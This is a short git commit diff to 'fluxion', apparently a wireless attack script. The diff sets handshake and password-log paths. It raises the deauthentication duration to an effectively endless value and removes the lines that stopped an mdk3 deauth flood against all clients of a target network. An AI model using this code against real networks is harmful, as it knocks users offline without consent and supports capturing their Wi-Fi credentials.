Update fluxion

This commit is contained in:
deltax 2016-05-01 07:01:26 -04:00
parent d91656da5e
commit 69beed9d7c
1 changed files with 2 additions and 3 deletions

View File

@ -18,7 +18,8 @@ DUMP_PATH="/tmp/TMPflux"
HANDSHAKE_PATH="/root/handshakes" HANDSHAKE_PATH="/root/handshakes"
PASSLOG_PATH="/root/pwlog" PASSLOG_PATH="/root/pwlog"
# Deauth duration during handshake capture # Deauth duration during handshake capture
DEAUTHTIME="20" # oo
DEAUTHTIME="9999999999999"
revision=35 revision=35
version=0.20 version=0.20
IP=192.168.1.1 IP=192.168.1.1
@ -3035,8 +3036,6 @@ function deauthmdk3 {
echo "$Host_MAC" >$DUMP_PATH/mdk3.txt echo "$Host_MAC" >$DUMP_PATH/mdk3.txt
xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating via mdk3 all clients on $Host_SSID" -e mdk3 $WIFI_MONITOR d -b $DUMP_PATH/mdk3.txt -c $Host_CHAN & xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating via mdk3 all clients on $Host_SSID" -e mdk3 $WIFI_MONITOR d -b $DUMP_PATH/mdk3.txt -c $Host_CHAN &
mdk3PID=$! mdk3PID=$!
sleep 15
kill $mdk3PID &>$flux_output_device
} }
# Deauth to a specific target # Deauth to a specific target